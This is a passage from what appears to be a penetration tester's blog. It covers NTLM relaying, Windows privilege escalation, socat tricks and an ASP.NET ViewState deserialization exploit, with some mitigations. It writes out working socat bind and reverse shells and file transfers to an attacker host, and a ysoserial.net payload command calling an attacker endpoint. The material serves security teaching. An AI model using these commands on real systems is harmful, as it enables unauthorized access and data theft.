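$proof     = $hmac2.ComputeHash([byte[]]($ServerChallenge + $Blob))
[System.BitConverter]::ToString($proof) -eq [System.BitConverter]::ToString($NtProofStr)   # $true when the guess is correct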

The attacker can control the challenge, which does allow the use of rainbow tables (precomputed lookup tables), but this only works for the older NTLMv1 protocol. In the NTLMv2 implementation, the client chooses part of the challenge which mitigates rainbow table attacks.

​Stage 3.2: Relaying the Hash

​Since the attacker can choose the challenge, nothing prevents the attacker from retrieving a challenge from a service within the network and having the victim solve it. This allows the attacker to authenticate to an arbitrary service within the network as the victim.
Depending on the victim privileges, this can be leveraged to further compromise machines within the network, gain access to file servers, update Active Directory objects on the Domain Controller, etc.

The advantage of relaying is that the credential material never has to be cracked, although you can still perform a brute force to recover the plaintext password as described in stage 3.1. The only downside is the additional time required to set up the relay server and select appropriate relay targets.

​
This can be done using Impacket ntlmrelayx, Inveigh-Relay or Responder MultiRelay.

​Recommendations and Mitigations

​I’m going to break down the recommendations and mitigation into each of the 3 phases of the attack.

Stage 1: The Rogue Server
  • Use MAC address filtering to prevent rogue devices connecting to the network
  • Ensure adequate endpoint protections and hardening best practices are applied to prevent a compromise in the initial instance
  • Block SMB and WebDAV outbound to the Internet

Stage 2: Coerced Authentication
  • Patch operating systems
  • Disable LLMNR and NBT-NS
  • Disable WebDAV on all endpoints
  • Ensure ARP packets are validated against an authoritative source such as the DHCP lease reservations
  • Ensure there are no stale network address configurations
  • Ensure file shares follow the principle of least privilege
  • Ensure reasonable and logical network segregation

Stage 3: Relaying and Cracking
  • Enable SMB and LDAP signing
  • Ensure a strong password policy
  • Put privileged accounts into the Protected Users Security Group

The attack leverages weaknesses in Microsoft protocols and default configurations. Even if all the recommendations and mitigations are applied, some methods such as backdoored files will continue to be effective, but the impact should be limited.

Game Over Privileges

5/11/2020

On Windows, a privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer. There are 36 privileges defined in the Privilege Constants, although a number are used internally by the operating system. Several privileges are considered game over, in that if a user gains access to one of them, they effectively have every privilege and can achieve code execution under the NT AUTHORITY\SYSTEM (referred to as SYSTEM) account.

I wanted to discuss privileges from a practical offensive standpoint. These are actually just my notes on privileges made into a blog post because I needed to clean them up.
​

Attack 1:
If you gain access to (through a misconfiguration, vulnerability in a more privileged process, etc) any of the game over privileges you have completely compromised the local computer.

The privileges SeAssignPrimaryToken, SeCreateToken, SeDebug, SeLoadDriver, SeRestore, SeTakeOwnership and SeTcb are guaranteed to give you SYSTEM. Other privileges could also be abused in specific scenarios and should be investigated.

https://github.com/gtworek/Priv2Admin/blob/master/README.md
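A quick way to check whether the current token holds any of these (a disabled privilege still counts, since it can simply be re-enabled) is:

whoami /priv | Select-String 'SeAssignPrimaryToken|SeCreateToken|SeDebug|SeLoadDriver|SeRestore|SeTakeOwnership|SeTcb'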

Attack 2:
If you are SYSTEM then regardless of the privileges (even if they have been stripped) you have every privilege:

https://www.tiraniddo.dev/2020/01/dont-use-system-tokens-for-sandboxing.html

Attack 3:
Starting with Windows 10 Microsoft have removed SeImpersonate and SeAssignPrimaryToken privileges from service processes when they are not required. Task Scheduler can be leveraged to regain the lost privileges:

https://itm4n.github.io/localservice-privileges/
https://github.com/itm4n/FullPowers

Attack 4:
Often when performing exploits against software running on Windows you will gain code execution within the context of the Local or Network service accounts.

Up until Windows version 1809 (and Server 2019) you could leverage the SeImpersonate or SeAssignPrimaryToken privileges of the service accounts by abusing NTLM local authentication via reflection. This allowed the impersonation or assignment of the SYSTEM token. The most common variations of this method are HotPotato, RottenPotato, RottenPotatoNG and JuicyPotato. 

JuicyPotato is the most modern and used method. There are several implementations of juicy-potato that use reflective DLL injection or are implemented as a .NET assembly to avoid dropping files to disk.

On Windows version 1809 (and Server 2019) and later, Microsoft “fixed” the reflected NTLM authentication abuse that allowed JuicyPotato to function. This sparked new research into escalating privileges or regaining the lost permissions. I’m going to list the new methods and research that now exist.

#1) https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
https://github.com/antonioCoco/RogueWinRM
https://ethicalchaos.dev/2020/04/13/sweetpotato-local-service-to-system-privesc/
https://github.com/CCob/SweetPotato

#2) https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://decoder.cloud/2020/05/04/from-network-service-to-system/
https://github.com/decoder-it/NetworkServiceExploit

#3) https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
https://github.com/itm4n/PrintSpoofer

#4) https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
https://github.com/antonioCoco/RoguePotato

I’ve opted not to go into detail of the methods as all of the write-ups are fantastic and I highly recommend giving them a read. With the number of methods available it would be highly unlikely that the compromise of a service account doesn’t lead to SYSTEM.

Advanced socat

4/22/2020


socat is a general-purpose networking tool that allows the creation of two bidirectional streams. It has a large amount of support for different protocols and data sources, including OPENSSL, SOCKS4, TCP, UDP, TAP, SCTP and more. When performing a penetration test this tool can be leveraged to bypass basic firewall restrictions and transfer files across the network.

Statically compiled socat

There is a cool project called static-toolbox which provides statically compiled networking and debugging tools. This project includes statically compiled versions of socat for x86/x86_64, which gives the tool a lot more portability between differing Linux distributions and major library versions, for a small cost of ~2MB.

Simple Listening Shell

On the client run:

socat TCP-LISTEN:8080 exec:"bash -i",pty,stderr,setsid,sigint,sane

On the attacker machine run

socat - TCP:$clientip:8080
#or
nc $clientip 8080

This shell works great, but there are two obvious problems:

  • The IP will be listening for any connection
  • The firewall might block non-default ports (such as 8080)

We can get around this by using the outbound technique that I will show later.

Simple File Transfer

There are two methods of doing file transfers:

  • Opening a listening port and waiting for the file
  • Opening a listening port to send the file

Overall, the better of these two methods is having the client connect to a listening port to download the file, as this is less likely to be blocked by firewalls. To do this you need to run the following two commands.

On the attacker:

socat file:secretfile TCP-LISTEN:8080

On the client:

socat TCP:$attackerip:8080 OPEN:/tmp/secretfile,create

Encrypted Listening Shell

We can generate an encrypted reverse shell with client and server keys to allow only our chosen attacker machine to connect to the server.

# Find more detailed steps at:
#   http://www.dest-unreach.org/socat/doc/socat-openssl.txt
openssl genrsa -out server.key 2048
openssl genrsa -out client.key 2048

# IMPORTANT: When generating the server.crt it will 
#   ask for a "commonName", make sure this is the
#   same as your attacker's hostname!
openssl req -new -key server.key -x509 -days 3653 -out server.crt
openssl req -new -key client.key -x509 -days 3653 -out client.crt

cat server.key server.crt > server.pem
cat client.key client.crt > client.pem

rm {server,client}.key

chmod 600 server.pem client.pem

#Server.pem is on the host.
#Client.crt is on the host.
#On the host run:
socat OPENSSL-LISTEN:1443,reuseaddr,fork \
                         ,cert=server.pem,cafile=client.crt,verify=1 \
    exec:'bash -i',pty,stderr,setsid,sigint,sane

#Server.crt is on the client
#Client.pem is on the client.
#On the client run:
socat \
    OPENSSL:localhost:1443,verify=1,cert=client.pem,cafile=server.crt -

socat reverse shell

Sometimes the network will be configured in such a way that only certain ports will be able to host a listening service, such as 80 and 443 on a web host for example. In this case, unless we have sudo privileges, establishing a listening shell with socat is not possible. To get around this we can instead forward a shell or service through an outbound connection. We can also establish a PTY shell in a similar fashion.

On the attacker machine run:

sudo socat -d TCP-LISTEN:80 -

On the client run:

socat -d exec:"bash -i",pty,stderr,setsid,sigint,sane TCP:$attackerip:80

Forwarding a service through an outbound connection

Sometimes we want to be able to access a local service on the client machine; for example, to reach the SSH service running on the client we need to be able to use the ssh command, or to use our browser to interact with a local web server. We can achieve this by creating a second listening port on the attacker machine that allows our programs to connect and interact with the client's service. On the attacker machine we create two listening ports: socat will wait for a connection from our client on port 80 and then wait for a suitable program to connect on port 10023.

sudo socat -d TCP-LISTEN:80,fork,reuseaddr TCP-LISTEN:10023

On the client run:

socat -d TCP:localhost:22 TCP:$attackerip:80

This will allow you to connect to the service (In this case SSH) by connecting to local port 10023.

ssh root@localhost -p 10023
#or
curl http://localhost:10023

socat encrypted reverse shell

On the attacker machine we create a listening port, it will wait for a connection from our client on port 80 and then allow us to interact with it from stdin.

sudo socat -d \
    OPENSSL-LISTEN:80,reuseaddr,fork,\
    cert=server.pem,cafile=client.crt,verify=1 -

On the client machine we need to run:

socat exec:"bash -i",pty,stderr,setsid,sigint,sane \
      OPENSSL:localhost:80,verify=1,cert=client.pem,cafile=server.crt

Forwarding a service through an encrypted outbound connection

After following the key generation steps listed in the encrypted reverse shell section we can wrap our outbound reverse shell in openssl using the following commands.

On the attacker machine we need to run:

sudo socat -d \
    OPENSSL-LISTEN:80,reuseaddr,fork,\
    cert=server.pem,cafile=client.crt,verify=1 \
    TCP-LISTEN:10023,reuseaddr,fork

On the client machine we need to run:

socat TCP:localhost:22 \
      OPENSSL:localhost:80,verify=1,cert=client.pem,cafile=server.crt

Finally, we can create a connection by running the final connect command on the attacker machine.

ssh root@localhost -p 10023
#or
curl http://localhost:10023

Forwarding packets through a web proxy with socat

Sometimes a service or program will not allow the user to set an HTTP proxy. For example, you might want to inspect the HTTP connections a browser is making, but its proxy settings are broken. The command to do so follows the general form:

socat TCP-LISTEN:$lstport \
    PROXY:$proxyip:$dstip:$dstport,proxyport=$proxyport
socat TCP-LISTEN:8000 PROXY:localhost:google.com:80,proxyport=8080

In your browser you would point to http://localhost:8000 and the traffic would be redirected to the end server (http://google.com) through the proxy running on port 8080. This would allow you to set up Burp Suite and use it to inspect packets without having to set proxy configurations in the actual browser. This becomes especially useful when reversing a program's protocol where the program does not allow you to set a proxy.


Making a PoC for CVE-2020-0668

4/2/2020

Recently Clément Labro released a blog post about an arbitrary file move vulnerability he discovered. This was CVE-2020-0668 which involved abusing Service Tracing to cause an arbitrary file move with the help of symlinks.

I confirmed the vulnerability using the Google Project Zero symboliclink-testing-tools but wanted to create a standalone executable, that could be easily shipped to a target machine to exploit the CVE. C# seemed like an appropriate language as I could leverage the NtApiDotNet package which had done all the hard work for me.
​

Writing the code was as simple as following the instructions in the blog post and making sure I understood the mount point and symbolic link trickery. Luckily this has been described by James Forshaw in a number of blog posts, and implemented in his API methods NtFile.CreateMountPoint and NtSymbolicLink.Create. The complete proof of concept code can be found on GitHub here.

Exploiting ASP.NET ViewState Misconfigurations for Remote Code Execution

4/1/2020

This post explores how an ASP.NET project incorrectly disclosing its web.config containing static keys allows for remote code execution. The common cases for exploiting this vulnerability are when the web application has published its static machine keys to GitHub, as with the example project for this post (https://github.com/ozajay0207/EGVC), or when the application has a local file inclusion vulnerability that allows the attacker to obtain a copy of the static keys from the web.config file.

In order to keep track of different sessions, ASP.NET applications use a ViewState that contains serialized application defined data. Due to the nature of serialization, if the user can control and create a valid ViewState, then they can use a deserialization attack to achieve remote code execution on the host.

In order to mitigate this potential attack ASP.NET applications can perform HMAC signing of the ViewState to verify the authenticity of the object. Another option is using encryption with a secret key to prevent reading or modification of its contents. Keeping these keys secret is paramount in preventing ViewState deserialization attacks and remote code execution.

These mitigations rely on each application utilising uniquely generated validation and decryption keys, which is not always the case. Recently, CVE-2020-0688 exposed Microsoft for including static validation and decryption keys in the Microsoft Exchange Server control panel. The same keys were generated once and shared among every Exchange installation, allowing anyone with a copy of the server to recover and misuse these key values.
To demonstrate this attack, a proof of concept will be performed against a public GitHub project that contained this vulnerability. Figure 1 is the web.config from the chosen project and contains two security issues. Firstly, the validation and decryption keys are hard coded; secondly, the ViewState encryption mode has been disabled.
​A successful attack requires not only the validation key, but also a page on the website that uses a ViewState. In this case the website has a registration page that includes various text entries and controls; a perfect candidate for using ViewState. In the registration page’s source code there are two hidden elements that include the page’s ViewState and ViewState Generator.
​Now that the three required pieces of information have been recovered, a payload can be generated using ysoserial.net. The malicious payload will execute an arbitrary command, in this case a simple PowerShell web request to a controlled endpoint, is used so that the code execution can be verified.
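The command line looks something like the following; the gadget, generator and key values are placeholders, and the exact parameter names can differ between ysoserial.net releases:

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -c Invoke-WebRequest http://attacker-endpoint/hit" --generator="8D68BE10" --validationalg="SHA1" --validationkey="<validationKey from web.config>"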
The tool ysoserial.net creates a payload that is base64 encoded, but supplying this directly to the server in a request will cause parsing errors. This occurs because the base64 alphabet includes some symbols, such as the equals sign, that will be misinterpreted in an HTTP request. To remedy this the payload must be URL encoded. With this encoding the necessary symbols will be correctly interpreted by the ASP.NET application.
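In PowerShell this is a one-liner (assuming the base64 payload is in $payload):

$encodedPayload = [uri]::EscapeDataString($payload)   # percent-encodes '=', '+' and '/' for use in the request body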
​
To perform the attack, the default HTTP POST request from the registration form was captured in Burp Suite, and the __VIEWSTATE parameter was replaced with the malicious ViewState generated by ysoserial.net. Once the request is sent to the server the PowerShell command is executed, and a corresponding GET request is made to our controlled endpoint.
​From here it is straightforward for an attacker to modify the command to download and execute a malicious PowerShell script and create a reverse shell.